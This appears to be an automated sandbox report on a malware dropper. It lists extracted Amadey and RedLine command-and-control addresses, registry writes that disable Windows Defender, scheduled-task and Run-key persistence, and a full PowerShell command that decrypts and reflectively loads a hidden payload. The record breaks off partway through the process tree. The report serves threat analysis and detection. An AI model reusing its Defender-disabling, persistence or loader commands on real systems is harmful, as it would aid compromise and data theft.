Analysis
max time kernel: 124s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26-01-2023 04:31
Behavioral task behavioral1
Sample: tmp.exe
Resource: win7-20221111-en
Behavioral task behavioral2
Sample: tmp.exe
Resource: win10v2004-20221111-en
General
Target: tmp.exe
Size: 235KB
MD5: 77e0a0a90e0231493bd421f4cdab0668
SHA1: b09f8951b42a2993b637df9e41f6a25be106c2cb
SHA256: 75520c76a4051b2be15db8625f35d4c1c63d93686bf849e6fc67f4e62d2fd000
SHA512: d6a1c3ebe00c5d236dccab9fe867c8a87dea2a71cf54900cfe47cacf0c1d7a8e2dfbe91b466cad318144976fce340ba6f5e5da9a5c0cae71c1666ba09e6510e4
SSDEEP: 6144:FSfSsOzqs7nAV3QN2tW0J3SluVy3VYygXqgkX:hbN6J4uVy3V3ga
Malware Config
Extracted
Family: amadey
Version: 3.66
C2: 62.204.41.27/9djZdj09/index.php
C2: 62.204.41.88/9vdVVVjsw/index.php
Extracted
Family: redline
Botnet: fermo
C2: 62.204.41.159:4062
auth_value: 6a3268170dff397208b77e34670d840e
Extracted
Family: redline
Botnet: temp777777777777
C2: 82.115.223.9:15486
auth_value: 39fa6f6612a4320728bfb830f0e86553
Extracted
Family: amadey
Version: 3.65
C2: 77.73.134.27/8bmdh3Slb2/index.php
Extracted
Family: redline
Botnet: usainstall
C2: 45.15.157.0:22598
auth_value: 38d8acbb300a0eb782f51350c8bcdc80
Extracted
Family: redline
Botnet: cheat
C2: 165.227.157.17:80
Signatures
-
Detect rhadamanthys stealer shellcode 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3848-176-0x00000000005A0000-0x00000000005BD000-memory.dmp | family_rhadamanthys
behavioral2/memory/1104-263-0x0000000001050000-0x000000000106D000-memory.dmp | family_rhadamanthys
behavioral2/memory/1104-295-0x0000000001050000-0x000000000106D000-memory.dmp | family_rhadamanthys
behavioral2/memory/1644-297-0x0000000002040000-0x000000000205D000-memory.dmp | family_rhadamanthys
-
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | desto1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | desto.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | loda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | desto1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | desto1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | desto1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | desto1.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | loda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | loda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | loda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | desto.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | desto.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | loda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | desto.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | desto.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | loda.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | desto1.exe
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 2560 rundll32.exe
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\1000073001\buildee.exe | family_redline
behavioral2/memory/924-282-0x0000000000C10000-0x0000000000C2E000-memory.dmp | family_redline
C:\Users\Admin\AppData\Local\Temp\1000073001\buildee.exe | family_redline
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++, first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
Processes:
description | pid | process | target process
PID 3336 created 2808 | 3336 | OwvtknErB0Wl.exe | taskhostw.exe
PID 2284 created 1032 | 2284 | XandETC.exe | Explorer.EXE
PID 2284 created 1032 | 2284 | XandETC.exe | Explorer.EXE
PID 2284 created 1032 | 2284 | XandETC.exe | Explorer.EXE
PID 2284 created 1032 | 2284 | XandETC.exe | Explorer.EXE
PID 11128 created 1032 | 11128 | updater.exe | Explorer.EXE
PID 11128 created 1032 | 11128 | updater.exe | Explorer.EXE
PID 11128 created 1032 | 11128 | updater.exe | Explorer.EXE
PID 11128 created 1032 | 11128 | updater.exe | Explorer.EXE
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | nonetrollplease.exe
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
63 | 4624 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 26 IoCs
Processes:
pid | process
408 | nbveek.exe
2844 | loda.exe
4948 | desto1.exe
4172 | fermo1.exe
1944 | varka1.exe
3696 | love.exe
3848 | love1.exe
4556 | fermo.exe
3624 | desto.exe
1580 | lebro.exe
4332 | nbveek.exe
3336 | OwvtknErB0Wl.exe
4800 | Player31.exe
4580 | nbveek.exe
1936 | nonetrollplease.exe
4440 | pb1111.exe
1644 | cc.exe
4208 | Acslq.exe
4188 | jn-17L.exe
924 | buildee.exe
2236 | random.exe
4088 | random.exe
2284 | XandETC.exe
7096 | Acslq.exe
7568 | nbveek.exe
11128 | updater.exe
-
Stops running service(s) 3 TTPs
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe | vmprotect
behavioral2/memory/4440-252-0x0000000140000000-0x000000014061F000-memory.dmp | vmprotect
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | nonetrollplease.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | nonetrollplease.exe
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | Acslq.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | random.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | tmp.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | Player31.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | jn-17L.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | lebro.exe
-
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spykviya3dg.lnk | powershell.exe
-
Loads dropped DLL 10 IoCs
Processes:
pid | process
3336 | OwvtknErB0Wl.exe
316 | rundll32.exe
1552 | rundll32.exe
1620 | rundll32.exe
528 | rundll32.exe
3412 | rundll32.exe
2152 | rundll32.exe
1964 | rundll32.exe
4900 | rundll32.exe
4840 | rundll32.exe
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | loda.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | desto1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | desto1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | desto.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fermo1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000051051\\fermo1.exe" | nbveek.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\varka1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000052051\\varka1.exe" | nbveek.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fermo.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000055051\\fermo.exe" | nbveek.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fmqkuuswyi = "\"C:\\Users\\Admin\\AppData\\Roaming\\Vmjahlk\\Fmqkuuswyi.exe\"" | Acslq.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | nonetrollplease.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
28 | api.ipify.org
-
Drops file in System32 directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
pid | process
3848 | love1.exe
3848 | love1.exe
3848 | love1.exe
1104 | fontview.exe
1104 | fontview.exe
1104 | fontview.exe
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | process | target process
PID 3336 set thread context of 212 | 3336 | OwvtknErB0Wl.exe | ngentask.exe
PID 1936 set thread context of 4952 | 1936 | nonetrollplease.exe | AppLaunch.exe
PID 4208 set thread context of 7096 | 4208 | Acslq.exe | Acslq.exe
-
Drops file in Program Files directory 1 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
8140 | sc.exe
4152 | sc.exe
14156 | sc.exe
14204 | sc.exe
4204 | sc.exe
2356 | sc.exe
1880 | sc.exe
14128 | sc.exe
14176 | sc.exe
14228 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
Processes:
pid | pid_target | process | target process
2200 | 4948 | WerFault.exe | desto1.exe
1116 | 1944 | WerFault.exe | varka1.exe
4064 | 3624 | WerFault.exe | desto.exe
1404 | 1644 | WerFault.exe | cc.exe
3528 | 3336 | WerFault.exe | OwvtknErB0Wl.exe
3064 | 3336 | WerFault.exe | OwvtknErB0Wl.exe
1744 | 316 | WerFault.exe | rundll32.exe
1544 | 1620 | WerFault.exe | rundll32.exe
4576 | 2152 | WerFault.exe | rundll32.exe
3964 | 4840 | WerFault.exe | rundll32.exe
4480 | 7096 | WerFault.exe | Acslq.exe
-
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | love1.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | love1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | love1.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | love1.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | fontview.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fontview.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | love1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | fontview.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fontview.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fontview.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | ngentask.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ngentask.exe
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
1464 | schtasks.exe
1620 | schtasks.exe
1404 | schtasks.exe
-
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 7 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\.uuw0jus4tz5\ = "cmwgfwxz1ui" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell\open\command | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell\open | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]43,40,34,231,152,221,253,185,62,148,240,241,99,206,96,33,14,60,169,236,234,238,30,154,71,251,34,196,130,93,105,193);$A.IV=@([byte]12,149,177,4,191,6,243,253,155,163,193,103,144,104,239,238);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\s1zq5lfytlz.uuw0jus4tz5'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[xF9MBhD11Uboko4.PbxDwsvP6fEK0qiF26sgtXEsvZYYfDOk56NDcpRwBQsm5JPMxpMT0PxTTSJxPvtdOqtePwvITy4GLpW8H]::SaDHVXEPeR09i1FG9E5Li7xIYPSH();\"" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\.uuw0jus4tz5 | powershell.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 49 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
Level 1: C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
-
Level 2: C:\Users\Admin\AppData\Local\Temp\tmp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe" /F
- Creates scheduled task(s)
-
Level 4: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit
- Suspicious use of WriteProcessMemory
-
Level 5: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
Level 5: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "nbveek.exe" /P "Admin:N"
-
Level 5: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "nbveek.exe" /P "Admin:R" /E
-
Level 5: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
Level 5: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "..\5eb6b96734" /P "Admin:N"
-
Level 5: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "..\5eb6b96734" /P "Admin:R" /E
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000049001\loda.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000049001\loda.exe"
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000050001\desto1.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000050001\desto1.exe"
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 5: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 948
- Program crash
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000051051\fermo1.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000051051\fermo1.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000052051\varka1.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000052051\varka1.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 5: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 1236
- Program crash
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000053001\love.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000053001\love.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Users\Admin\AppData\Roaming\1000054000\love1.exe
Command line: "C:\Users\Admin\AppData\Roaming\1000054000\love1.exe"
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000055051\fermo.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000055051\fermo.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000056001\desto.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000056001\desto.exe"
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 5: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 952
- Program crash
-
Level 4: C:\Users\Admin\AppData\Local\Temp\1000057001\lebro.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000057001\lebro.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Level 5: C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
Level 6: C:\Windows\SysWOW64\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
- Creates scheduled task(s)
-
Level 6: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
- Suspicious use of WriteProcessMemory
-
Level 7: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
Level 7: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "nbveek.exe" /P "Admin:N"
-
Level 7: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "nbveek.exe" /P "Admin:R" /E
-
Level 7: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
Level 7: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "..\9e0894bcc4" /P "Admin:N"
-
Level 7: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "..\9e0894bcc4" /P "Admin:R" /E
-
Level 6: C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
Level 7: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
Level 7: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1280
- Program crash
-
Level 7: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1288
- Program crash
-
Level 6: C:\Users\Admin\AppData\Local\Temp\1000051001\Player31.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000051001\Player31.exe"
- Executes dropped EXE
- Checks computer location settings
-
Level 7: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
- Executes dropped EXE
- Checks computer location settings
-
Level 8: C:\Windows\SysWOW64\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
- Creates scheduled task(s)
-
Level 8: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
-
Level 9: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
Level 9: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "nbveek.exe" /P "Admin:N"
-
Level 9: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "nbveek.exe" /P "Admin:R" /E
-
Level 9: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
Level 9: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "..\16de06bfb4" /P "Admin:N"
-
Level 9: C:\Windows\SysWOW64\cacls.exe
Command line: CACLS "..\16de06bfb4" /P "Admin:R" /E
-
Level 8: C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe"
- Executes dropped EXE
-
Level 8: C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe"
- Executes dropped EXE
- Checks computer location settings
-
Level 9: C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe" -h
- Executes dropped EXE
-
Level 8: C:\Users\Admin\AppData\Local\Temp\1000072001\XandETC.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000072001\XandETC.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
Level 9: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
